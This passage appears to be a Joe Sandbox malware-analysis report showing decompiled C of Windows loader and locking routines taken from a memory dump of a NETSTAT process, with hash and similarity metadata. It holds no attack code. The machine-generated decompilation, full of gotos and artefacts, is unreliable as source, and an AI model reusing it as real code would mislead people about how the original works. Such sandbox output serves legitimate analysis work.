                										__eflags = 0;
                										L49:
                										E0336FFB0(_t198, _t241, 0x3448608);
                										__eflags = _t253;
                										if(_t253 != 0) {
                											L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                										}
                										goto L31;
                									}
                									 *0x3446e48 = _t241;
                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                									__eflags = _t253;
                									if(_t253 != 0) {
                										_t57 = _t253 + 0x34;
                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                										__eflags =  *_t57;
                										if( *_t57 == 0) {
                											goto L49;
                										}
                									}
                									goto L48;
                								}
                								L31:
                								_t229 = _t241;
                								goto L14;
                							}
                							_v73 = 1;
                							_v64 = _t240;
                							asm("lock bts dword [esi], 0x0");
                							if(_t275 < 0) {
                								_t231 =  *0x3448608; // 0x0
                								while(1) {
                									_v60 = _t231;
                									__eflags = _t231 & 0x00000001;
                									if((_t231 & 0x00000001) != 0) {
                										goto L76;
                									}
                									_t73 = _t231 + 1; // 0x1
                									_t210 = _t73;
                									asm("lock cmpxchg [edi], ecx");
                									__eflags = _t231 - _t231;
                									if(_t231 != _t231) {
                										L92:
                										_t133 = E03386B90(_t210,  &_v64);
                										_t262 =  *0x3448608; // 0x0
                										L93:
                										_t231 = _t262;
                										continue;
                									}
                									_t240 = _v56;
                									goto L10;
                									L76:
                									_t169 = E0338E180(_t133);
                									__eflags = _t169;
                									if(_t169 != 0) {
                										_push(0xc000004b);
                										_push(0xffffffff);
                										E033997C0();
                										_t231 = _v68;
                									}
                									_v72 = 0;
                									_v24 =  *( *[fs:0x18] + 0x24);
                									_v16 = 3;
                									_v28 = 0;
                									__eflags = _t231 & 0x00000002;
                									if((_t231 & 0x00000002) == 0) {
                										_v32 =  &_v36;
                										_t174 = _t231 >> 4;
                										__eflags = 1 - _t174;
                										_v20 = _t174;
                										asm("sbb ecx, ecx");
                										_t210 = 3 |  &_v36;
                										__eflags = _t174;
                										if(_t174 == 0) {
                											_v20 = 0xfffffffe;
                										}
                									} else {
                										_v32 = 0;
                										_v20 = 0xffffffff;
                										_v36 = _t231 & 0xfffffff0;
                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                									}
                									asm("lock cmpxchg [edi], esi");
                									_t262 = _t231;
                									__eflags = _t262 - _t231;
                									if(_t262 != _t231) {
                										goto L92;
                									} else {
                										__eflags = _v72;
                										if(_v72 != 0) {
                											E0339006A(0x3448608, _t210);
                										}
                										__eflags =  *0x7ffe036a - 1;
                										if(__eflags <= 0) {
                											L89:
                											_t133 =  &_v16;
                											asm("lock btr dword [eax], 0x1");
                											if(__eflags >= 0) {
                												goto L93;
                											} else {
                												goto L90;
                											}
                											do {
                												L90:
                												_push(0);
                												_push(0x3448608);
                												E0339B180();
                												_t133 = _v24;
                												__eflags = _t133 & 0x00000004;
                											} while ((_t133 & 0x00000004) == 0);
                											goto L93;
                										} else {
                											_t218 =  *0x3446904; // 0x400
                											__eflags = _t218;
                											if(__eflags == 0) {
                												goto L89;
                											} else {
                												goto L87;
                											}
                											while(1) {
                												L87:
                												__eflags = _v16 & 0x00000002;
                												if(__eflags == 0) {
                													goto L89;
                												}
                												asm("pause");
                												_t218 = _t218 - 1;
                												__eflags = _t218;
                												if(__eflags != 0) {
                													continue;
                												}
                												goto L89;
                											}
                											goto L89;
                										}
                									}
                								}
                							}
                							L10:
                							_t229 =  *0x3446e48; // 0xb38880
                							_v72 = _t229;
                							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                								E0336FFB0(_t198, _t240, 0x3448608);
                								_t253 = _v76;
                								goto L29;
                							} else {
                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                								asm("lock cmpxchg [esi], ecx");
                								_t215 = 1;
                								if(1 != 1) {
                									while(1) {
                										_t246 = _t215 & 0x00000006;
                										_t180 = _t215;
                										__eflags = _t246 - 2;
                										_v56 = _t246;
                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                										asm("lock cmpxchg [edi], esi");
                										_t248 = _v56;
                										__eflags = _t180 - _t215;
                										if(_t180 == _t215) {
                											break;
                										}
                										_t215 = _t180;
                									}
                									__eflags = _t248 - 2;
                									if(_t248 == 2) {
                										__eflags = 0;
                										E033900C2(0x3448608, 0, _t235);
                									}
                									_t229 = _v72;
                								}
                								goto L14;
                							}
                						}
                					}
                				}
                				_t227 = 0;
                				_v75 = 0;
                				if(_t128 != 0) {
                					goto L4;
                				}
                				goto L2;
                			}

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9bb0f3fb1a492e65a4705949b308d9e955cba2c9bef34c1b15a194634f83ee2a
                • Instruction ID: 3455f6be47a219c07ec2497f4e17b6af2388304f1b5102d74f928fd7f13fb474
                • Opcode Fuzzy Hash: 9bb0f3fb1a492e65a4705949b308d9e955cba2c9bef34c1b15a194634f83ee2a
                • Instruction Fuzzy Hash: 70F12935A083459FE725DF29CCC072BB7E9AF86314F18896DE899DB250D734E841CB42
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E0336D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                				signed int _v8;
                				intOrPtr _v20;
                				signed int _v36;
                				intOrPtr* _v40;
                				signed int _v44;
                				signed int _v48;
                				signed char _v52;
                				signed int _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				intOrPtr _v80;
                				signed int _v84;
                				intOrPtr _v100;
                				intOrPtr _v104;
                				signed int _v108;
                				signed int _v112;
                				signed int _v116;
                				intOrPtr _v120;
                				signed int _v132;
                				char _v140;
                				char _v144;
                				char _v157;
                				signed int _v164;
                				signed int _v168;
                				signed int _v169;
                				intOrPtr _v176;
                				signed int _v180;
                				signed int _v184;
                				intOrPtr _v188;
                				signed int _v192;
                				signed int _v200;
                				signed int _v208;
                				intOrPtr* _v212;
                				char _v216;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed int _t204;
                				signed int _t206;
                				void* _t208;
                				signed int _t211;
                				signed int _t216;
                				intOrPtr _t217;
                				intOrPtr* _t218;
                				signed int _t226;
                				signed int _t239;
                				signed int* _t247;
                				signed int _t249;
                				void* _t252;
                				signed int _t256;
                				signed int _t269;
                				signed int _t271;
                				signed int _t277;
                				signed int _t279;
                				intOrPtr _t283;
                				signed int _t287;
                				signed int _t288;
                				void* _t289;
                				signed char _t290;
                				signed int _t292;
                				signed int* _t293;
                				unsigned int _t297;
                				signed int _t306;
                				signed int _t307;
                				signed int _t308;
                				signed int _t309;
                				signed int _t310;
                				intOrPtr _t311;
                				intOrPtr _t312;
                				signed int _t319;
                				signed int _t320;
                				signed int* _t324;
                				signed int _t337;
                				signed int _t338;
                				signed int _t339;
                				signed int* _t340;
                				void* _t341;
                				signed int _t344;
                				signed int _t348;
                				signed int _t349;
                				signed int _t351;
                				intOrPtr _t353;
                				void* _t354;
                				signed int _t356;
                				signed int _t358;
                				intOrPtr _t359;
                				signed int _t361;
                				signed int _t363;
                				signed short* _t365;
                				void* _t367;
                				intOrPtr _t369;
                				void* _t370;
                				signed int _t371;
                				signed int _t372;
                				void* _t374;
                				signed int _t376;
                				void* _t384;
                				signed int _t387;
                
                				_v8 =  *0x344d360 ^ _t376;
                				_t2 =  &_a20;
                				 *_t2 = _a20 & 0x00000001;
                				_t287 = _a4;
                				_v200 = _a12;
                				_t365 = _a8;
                				_v212 = _a16;
                				_v180 = _a24;
                				_v168 = 0;
                				_v157 = 0;
                				if( *_t2 != 0) {
                					__eflags = E03366600(0x34452d8);
                					if(__eflags == 0) {
                						goto L1;
                					} else {
                						_v188 = 6;
                					}
                				} else {
                					L1:
                					_v188 = 9;
                				}
                				if(_t365 == 0) {
                					_v164 = 0;
                					goto L5;
                				} else {
                					_t363 =  *_t365 & 0x0000ffff;
                					_t341 = _t363 + 1;
                					if((_t365[1] & 0x0000ffff) < _t341) {
                						L109:
                						__eflags = _t341 - 0x80;
                						if(_t341 <= 0x80) {
                							_t281 =  &_v140;
                							_v164 =  &_v140;
                							goto L114;
                						} else {
                							_t283 =  *0x3447b9c; // 0x0
                							_t281 = L03374620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                							_v164 = _t281;
                							__eflags = _t281;
                							if(_t281 != 0) {
                								_v157 = 1;
                								L114:
                								E0339F3E0(_t281, _t365[2], _t363);
                								_t200 = _v164;
                								 *((char*)(_v164 + _t363)) = 0;
                								goto L5;
                							} else {
                								_t204 = 0xc000009a;
                								goto L47;
                							}
                						}
                					} else {
                						_t200 = _t365[2];
                						_v164 = _t200;
                						if( *((char*)(_t200 + _t363)) != 0) {
                							goto L109;
                						} else {
                							while(1) {
                								L5:
                								_t353 = 0;
                								_t342 = 0x1000;
                								_v176 = 0;
                								if(_t287 == 0) {
                									break;
                								}
                								_t384 = _t287 -  *0x3447b90; // 0x77cf0000
                								if(_t384 == 0) {
                									_t353 =  *0x3447b8c; // 0xb32a08
                									_v176 = _t353;
                									_t320 = ( *(_t353 + 0x50))[8];
                									_v184 = _t320;
                								} else {
                									E03372280(_t200, 0x34484d8);
                									_t277 =  *0x34485f4; // 0xb33ce8
                									_t351 =  *0x34485f8 & 1;
                									while(_t277 != 0) {
                										_t337 =  *(_t277 - 0x50);
                										if(_t337 > _t287) {
                											_t338 = _t337 | 0xffffffff;
                										} else {
                											asm("sbb ecx, ecx");
                											_t338 =  ~_t337;
                										}
                										_t387 = _t338;
                										if(_t387 < 0) {
                											_t339 =  *_t277;
                											__eflags = _t351;
                											if(_t351 != 0) {
                												__eflags = _t339;
                												if(_t339 == 0) {
                													goto L16;
                												} else {
                													goto L118;
                												}
                												goto L151;
                											} else {
                												goto L16;
                											}
                											goto L17;
                										} else {
                											if(_t387 <= 0) {
                												__eflags = _t277;
                												if(_t277 != 0) {
                													_t340 =  *(_t277 - 0x18);
                													_t24 = _t277 - 0x68; // 0xb33c80
                													_t353 = _t24;
                													_v176 = _t353;
                													__eflags = _t340[3] - 0xffffffff;
                													if(_t340[3] != 0xffffffff) {
                														_t279 =  *_t340;
                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                															asm("lock inc dword [edi+0x9c]");
                															_t340 =  *(_t353 + 0x50);
                														}
                													}
                													_v184 = _t340[8];
                												}
                											} else {
                												_t339 =  *(_t277 + 4);
                												if(_t351 != 0) {
                													__eflags = _t339;
                													if(_t339 == 0) {
                														goto L16;
                													} else {
                														L118:
                														_t277 = _t277 ^ _t339;
                														goto L17;
                													}
                													goto L151;
                												} else {
                													L16:
                													_t277 = _t339;
                												}
                												goto L17;
                											}
                										}
                										goto L25;
                										L17:
                									}
                									L25:
                									E0336FFB0(_t287, _t353, 0x34484d8);
                									_t320 = _v184;
                									_t342 = 0x1000;
                								}
                								if(_t353 == 0) {
                									break;
                								} else {
                									_t366 = 0;
                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                										_t288 = _v164;
                										if(_t353 != 0) {
                											_t342 = _t288;
                											_t374 = E033ACC99(_t353, _t288, _v200, 1,  &_v168);
                											if(_t374 >= 0) {
                												if(_v184 == 7) {
                													__eflags = _a20;
                													if(__eflags == 0) {
                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                														if(__eflags != 0) {
                															_t271 = E03366600(0x34452d8);
                															__eflags = _t271;
                															if(__eflags == 0) {
                																_t342 = 0;
                																_v169 = _t271;
                																_t374 = E03367926( *(_t353 + 0x50), 0,  &_v169);
                															}
                														}
                													}
                												}
                												if(_t374 < 0) {
                													_v168 = 0;
                												} else {
                													if( *0x344b239 != 0) {
                														_t342 =  *(_t353 + 0x18);
                														E033DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                													}
                													if( *0x3448472 != 0) {
                														_v192 = 0;
                														_t342 =  *0x7ffe0330;
                														_t361 =  *0x344b218; // 0x0
                														asm("ror edi, cl");
                														 *0x344b1e0( &_v192, _t353, _v168, 0, _v180);
                														 *(_t361 ^  *0x7ffe0330)();
                														_t269 = _v192;
                														_t353 = _v176;
                														__eflags = _t269;
                														if(__eflags != 0) {
                															_v168 = _t269;
                														}
                													}
                												}
                											}
                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                												_t366 = 0xc000007a;
                											}
                											_t247 =  *(_t353 + 0x50);
                											if(_t247[3] == 0xffffffff) {
                												L40:
                												if(_t366 == 0xc000007a) {
                													__eflags = _t288;
                													if(_t288 == 0) {
                														goto L136;
                													} else {
                														_t366 = 0xc0000139;
                													}
                													goto L54;
                												}
                											} else {
                												_t249 =  *_t247;
                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                													goto L40;
                												} else {
                													_t250 = _t249 | 0xffffffff;
                													asm("lock xadd [edi+0x9c], eax");
                													if((_t249 | 0xffffffff) == 0) {
                														E03372280(_t250, 0x34484d8);
                														_t342 =  *(_t353 + 0x54);
                														_t165 = _t353 + 0x54; // 0x54
                														_t252 = _t165;
                														__eflags =  *(_t342 + 4) - _t252;
                														if( *(_t342 + 4) != _t252) {
                															L135:
                															asm("int 0x29");
                															L136:
                															_t288 = _v200;
                															_t366 = 0xc0000138;
                															L54:
                															_t342 = _t288;
                															L03393898(0, _t288, _t366);
                														} else {
                															_t324 =  *(_t252 + 4);
                															__eflags =  *_t324 - _t252;
                															if( *_t324 != _t252) {
                																goto L135;
                															} else {
                																 *_t324 = _t342;
                																 *(_t342 + 4) = _t324;
                																_t293 =  *(_t353 + 0x50);
                																_v180 =  *_t293;
                																E0336FFB0(_t293, _t353, 0x34484d8);
                																__eflags =  *((short*)(_t353 + 0x3a));
                																if( *((short*)(_t353 + 0x3a)) != 0) {
                																	_t342 = 0;
                																	__eflags = 0;
                																	E033937F5(_t353, 0);
                																}
                																E03390413(_t353);
                																_t256 =  *(_t353 + 0x48);
                																__eflags = _t256;
                																if(_t256 != 0) {
                																	__eflags = _t256 - 0xffffffff;
                																	if(_t256 != 0xffffffff) {
                																		E03389B10(_t256);
                																	}
                																}
                																__eflags =  *(_t353 + 0x28);
                																if( *(_t353 + 0x28) != 0) {
                																	_t174 = _t353 + 0x24; // 0x24
                																	E033802D6(_t174);
                																}
                																L033777F0( *0x3447b98, 0, _t353);
                																__eflags = _v180 - _t293;
                																if(__eflags == 0) {
                																	E0338C277(_t293, _t366);
                																}
                																_t288 = _v164;
                																goto L40;
                															}
                														}
                													} else {
                														goto L40;
                													}
                												}
                											}
                										}
                									} else {
                										L0336EC7F(_t353);
                										L033819B8(_t287, 0, _t353, 0);
                										_t200 = E0335F4E3(__eflags);
                										continue;
                									}
                								}
                								L41:
                								if(_v157 != 0) {
                									L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                								}
                								if(_t366 < 0) {
                									L46:
                									 *_v212 = _v168;
                									_t204 = _t366;
                									L47:
                									_pop(_t354);
                									_pop(_t367);
                									_pop(_t289);
                									return E0339B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                								} else {
                									_t206 =  *0x344b2f8; // 0x1190000
                									if((_t206 |  *0x344b2fc) == 0 || ( *0x344b2e4 & 0x00000001) != 0) {
                										goto L46;
                									} else {
                										_t297 =  *0x344b2ec; // 0x100
                										_v200 = 0;
                										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                											_t355 = _v168;
                											_t342 =  &_v208;
                											_t208 = E03406B68(_v168,  &_v208, _v168, __eflags);
                											__eflags = _t208 - 1;
                											if(_t208 == 1) {
                												goto L46;
                											} else {
                												__eflags = _v208 & 0x00000010;
                												if((_v208 & 0x00000010) == 0) {
                													goto L46;
                												} else {
                													_t342 = 4;
                													_t366 = E03406AEB(_t355, 4,  &_v216);
                													__eflags = _t366;
                													if(_t366 >= 0) {
                														goto L46;
                													} else {
                														asm("int 0x29");
                														_t356 = 0;
                														_v44 = 0;
                														_t290 = _v52;
                														__eflags = 0;
                														if(0 == 0) {
                															L108:
                															_t356 = 0;
                															_v44 = 0;
                															goto L63;
                														} else {
                															__eflags = 0;
                															if(0 < 0) {
                																goto L108;
                															}
                															L63:
                															_v112 = _t356;
                															__eflags = _t356;
                															if(_t356 == 0) {
                																L143:
                																_v8 = 0xfffffffe;
                																_t211 = 0xc0000089;
                															} else {
                																_v36 = 0;
                																_v60 = 0;
                																_v48 = 0;
                																_v68 = 0;
                																_v44 = _t290 & 0xfffffffc;
                																E0336E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                																_t306 = _v68;
                																__eflags = _t306;
                																if(_t306 == 0) {
                																	_t216 = 0xc000007b;
                																	_v36 = 0xc000007b;
                																	_t307 = _v60;
                																} else {
                																	__eflags = _t290 & 0x00000001;
                																	if(__eflags == 0) {
                																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                																		__eflags = _t349 - 0x10b;
                																		if(_t349 != 0x10b) {
                																			__eflags = _t349 - 0x20b;
                																			if(_t349 == 0x20b) {
                																				goto L102;
                																			} else {
                																				_t307 = 0;
                																				_v48 = 0;
                																				_t216 = 0xc000007b;
                																				_v36 = 0xc000007b;
                																				goto L71;
                																			}
                																		} else {
                																			L102:
                																			_t307 =  *(_t306 + 0x50);
                																			goto L69;
                																		}
                																		goto L151;
                																	} else {
                																		_t239 = L0336EAEA(_t290, _t290, _t356, _t366, __eflags);
                																		_t307 = _t239;
                																		_v60 = _t307;
                																		_v48 = _t307;
                																		__eflags = _t307;
                																		if(_t307 != 0) {
                																			L70:
                																			_t216 = _v36;
                																		} else {
                																			_push(_t239);
                																			_push(0x14);
                																			_push( &_v144);
                																			_push(3);
                																			_push(_v44);
                																			_push(0xffffffff);
                																			_t319 = E03399730();
                																			_v36 = _t319;
                																			__eflags = _t319;
                																			if(_t319 < 0) {
                																				_t216 = 0xc000001f;
                																				_v36 = 0xc000001f;
                																				_t307 = _v60;
                																			} else {
                																				_t307 = _v132;
                																				L69:
                																				_v48 = _t307;
                																				goto L70;
                																			}
                																		}
                																	}
                																}
                																L71:
                																_v72 = _t307;
                																_v84 = _t216;
                																__eflags = _t216 - 0xc000007b;
                																if(_t216 == 0xc000007b) {
                																	L150:
                																	_v8 = 0xfffffffe;
                																	_t211 = 0xc000007b;
                																} else {
                																	_t344 = _t290 & 0xfffffffc;
                																	_v76 = _t344;
                																	__eflags = _v40 - _t344;
                																	if(_v40 <= _t344) {
                																		goto L150;
                																	} else {
                																		__eflags = _t307;
                																		if(_t307 == 0) {
                																			L75:
                																			_t217 = 0;
                																			_v104 = 0;
                																			__eflags = _t366;
                																			if(_t366 != 0) {
                																				__eflags = _t290 & 0x00000001;
                																				if((_t290 & 0x00000001) != 0) {
                																					_t217 = 1;
                																					_v104 = 1;
                																				}
                																				_t290 = _v44;
                																				_v52 = _t290;
                																			}
                																			__eflags = _t217 - 1;
                																			if(_t217 != 1) {
                																				_t369 = 0;
                																				_t218 = _v40;
                																				goto L91;
                																			} else {
                																				_v64 = 0;
                																				E0336E9C0(1, _t290, 0, 0,  &_v64);
                																				_t309 = _v64;
                																				_v108 = _t309;
                																				__eflags = _t309;
                																				if(_t309 == 0) {
                																					goto L143;
                																				} else {
                																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                																					__eflags = _t226 - 0x10b;
                																					if(_t226 != 0x10b) {
                																						__eflags = _t226 - 0x20b;
                																						if(_t226 != 0x20b) {
                																							goto L143;
                																						} else {
                																							_t371 =  *(_t309 + 0x98);
                																							goto L83;
                																						}
                																					} else {
                																						_t371 =  *(_t309 + 0x88);
                																						L83:
                																						__eflags = _t371;
                																						if(_t371 != 0) {
                																							_v80 = _t371 - _t356 + _t290;
                																							_t310 = _v64;
                																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                																							_t311 = 0;
                																							__eflags = 0;
                																							while(1) {
                																								_v120 = _t311;
                																								_v116 = _t348;
                																								__eflags = _t311 - _t292;
                																								if(_t311 >= _t292) {
                																									goto L143;
                																								}
                																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                																								__eflags = _t371 - _t359;
                																								if(_t371 < _t359) {
                																									L98:
                																									_t348 = _t348 + 0x28;
                																									_t311 = _t311 + 1;
                																									continue;
                																								} else {
                																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                																										goto L98;
                																									} else {
                																										__eflags = _t348;
                																										if(_t348 == 0) {
                																											goto L143;
                																										} else {
                																											_t218 = _v40;
                																											_t312 =  *_t218;
                																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                																												_v100 = _t359;
                																												_t360 = _v108;
                																												_t372 = L03368F44(_v108, _t312);
                																												__eflags = _t372;
                																												if(_t372 == 0) {
                																													goto L143;
                																												} else {
                																													_t290 = _v52;
                																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03393C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                																													_t307 = _v72;
                																													_t344 = _v76;
                																													_t218 = _v40;
                																													goto L91;
                																												}
                																											} else {
                																												_t290 = _v52;
                																												_t307 = _v72;
                																												_t344 = _v76;
                																												_t369 = _v80;
                																												L91:
                																												_t358 = _a4;
                																												__eflags = _t358;
                																												if(_t358 == 0) {
                																													L95:
                																													_t308 = _a8;
                																													__eflags = _t308;
                																													if(_t308 != 0) {
                																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                																													}
                																													_v8 = 0xfffffffe;
                																													_t211 = _v84;
                																												} else {
                																													_t370 =  *_t218 - _t369 + _t290;
                																													 *_t358 = _t370;
                																													__eflags = _t370 - _t344;
                																													if(_t370 <= _t344) {
                																														L149:
                																														 *_t358 = 0;
                																														goto L150;
                																													} else {
                																														__eflags = _t307;
                																														if(_t307 == 0) {
                																															goto L95;
                																														} else {
                																															__eflags = _t370 - _t344 + _t307;
                																															if(_t370 >= _t344 + _t307) {
                																																goto L149;
                																															} else {
                																																goto L95;
                																															}
                																														}
                																													}
                																												}
                																											}
                																										}
                																									}
                																								}
                																								goto L97;
                																							}
                																						}
                																						goto L143;
                																					}
                																				}
                																			}
                																		} else {
                																			__eflags = _v40 - _t307 + _t344;
                																			if(_v40 >= _t307 + _t344) {
                																				goto L150;
                																			} else {
                																				goto L75;
                																			}
                																		}
                																	}
                																}
                															}
                															L97:
                															 *[fs:0x0] = _v20;
                															return _t211;
                														}
                													}
                												}
                											}
                										} else {
                											goto L46;
                										}
                									}
                								}
                								goto L151;
                							}
                							_t288 = _v164;
                							_t366 = 0xc0000135;
                							goto L41;
                						}
                					}
                				}
                				L151:
                			}









































































































                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmp
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0f5be7acbe953236f72759d42cf74f3c44bf7e762f55104dbd0cdeee97a9e4ef
                • Instruction ID: 72796654d29e14245ecdc26fe22151d5bd97eaaec2d2a5c81252d1f45c351e89
                • Opcode Fuzzy Hash: 0f5be7acbe953236f72759d42cf74f3c44bf7e762f55104dbd0cdeee97a9e4ef
                • Instruction Fuzzy Hash: 96E1C074B00359CFDB24DF24CDC4BA9F7B5BF45304F0881A9E909AB694DB74A981CB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E0336849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                				void* _t136;
                				signed int _t139;
                				signed int _t141;
                				signed int _t145;
                				intOrPtr _t146;
                				signed int _t149;
                				signed int _t150;
                				signed int _t161;
                				signed int _t163;
                				signed int _t165;
                				signed int _t169;
                				signed int _t171;
                				signed int _t194;
                				signed int _t200;
                				void* _t201;
                				signed int _t204;
                				signed int _t206;
                				signed int _t210;
                				signed int _t214;
                				signed int _t215;
                				signed int _t218;
                				void* _t221;
                				signed int _t224;
                				signed int _t226;
                				intOrPtr _t228;
                				signed int _t232;
                				signed int _t233;
                				signed int _t234;
                				void* _t237;
                				void* _t238;
                
                				_t236 = __esi;
                				_t235 = __edi;
                				_t193 = __ebx;
                				_push(0x70);
                				_push(0x342f9c0);
                				E033AD0E8(__ebx, __edi, __esi);
                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                				if( *0x3447b04 == 0) {
                					L4:
                					goto L5;
                				} else {
                					_t136 = E0336CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                					_t236 = 0;
                					if(_t136 < 0) {
                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                					}
                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                						_t193 =  *( *[fs:0x30] + 0x18);
                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                						 *(_t237 - 0x68) = _t236;
                						 *(_t237 - 0x6c) = _t236;
                						_t235 = _t236;
                						 *(_t237 - 0x60) = _t236;
                						E03372280( *[fs:0x30], 0x3448550);
                						_t139 =  *0x3447b04; // 0x1
                						__eflags = _t139 - 1;
                						if(__eflags != 0) {
                							_t200 = 0xc;
                							_t201 = _t237 - 0x40;
                							_t141 = E0338F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                							 *(_t237 - 0x44) = _t141;
                							__eflags = _t141;
                							if(_t141 < 0) {
                								L50:
                								E0336FFB0(_t193, _t235, 0x3448550);
                								L5:
                								return E033AD130(_t193, _t235, _t236);
                							}
                							_push(_t201);
                							_t221 = 0x10;
                							_t202 =  *(_t237 - 0x40);
                							_t145 = E03351C45( *(_t237 - 0x40), _t221);
                							 *(_t237 - 0x44) = _t145;
                							__eflags = _t145;
                							if(_t145 < 0) {
                								goto L50;
                							}
                							_t146 =  *0x3447b9c; // 0x0
                							_t235 = L03374620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                							 *(_t237 - 0x60) = _t235;
                							__eflags = _t235;
                							if(_t235 == 0) {
                								_t149 = 0xc0000017;
                								 *(_t237 - 0x44) = 0xc0000017;
                							} else {
                								_t149 =  *(_t237 - 0x44);
                							}
                							__eflags = _t149;
                							if(__eflags >= 0) {
                								L8:
                								 *(_t237 - 0x64) = _t235;
                								_t150 =  *0x3447b10; // 0x8
                								 *(_t237 - 0x4c) = _t150;
                								_push(_t237 - 0x74);
                								_push(_t237 - 0x39);
                								_push(_t237 - 0x58);
                								_t193 = E0338A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                								 *(_t237 - 0x44) = _t193;
                								__eflags = _t193;
                								if(_t193 < 0) {
                									L30:
                									E0336FFB0(_t193, _t235, 0x3448550);
                									__eflags = _t235 - _t237 - 0x38;
                									if(_t235 != _t237 - 0x38) {
                										_t235 =  *(_t237 - 0x48);
                										L033777F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                									} else {
                										_t235 =  *(_t237 - 0x48);
                									}
                									__eflags =  *(_t237 - 0x6c);
                									if( *(_t237 - 0x6c) != 0) {
                										L033777F0(_t235, _t236,  *(_t237 - 0x6c));
                									}
                									__eflags = _t193;
                									if(_t193 >= 0) {
                										goto L4;
                									} else {
                										goto L5;
                									}
                								}
                								_t204 =  *0x3447b04; // 0x1
                								 *(_t235 + 8) = _t204;
                								__eflags =  *((char*)(_t237 - 0x39));
                								if( *((char*)(_t237 - 0x39)) != 0) {
                									 *(_t235 + 4) = 1;
                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                									_t161 =  *0x3447b10; // 0x8
                									 *(_t237 - 0x4c) = _t161;
                								} else {
                									 *(_t235 + 4) = _t236;
                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                								}
                								 *((intOrPtr*)(_t237 - 0x54)) = E033937C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                								_t224 = _t236;
                								 *(_t237 - 0x40) = _t236;
                								 *(_t237 - 0x50) = _t236;
                								while(1) {
                									_t163 =  *(_t235 + 8);
                									__eflags = _t224 - _t163;
                									if(_t224 >= _t163) {
                										break;
                									}
                									_t228 =  *0x3447b9c; // 0x0
                									_t214 = L03374620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                									 *(_t237 - 0x78) = _t214;
                									__eflags = _t214;
                									if(_t214 == 0) {
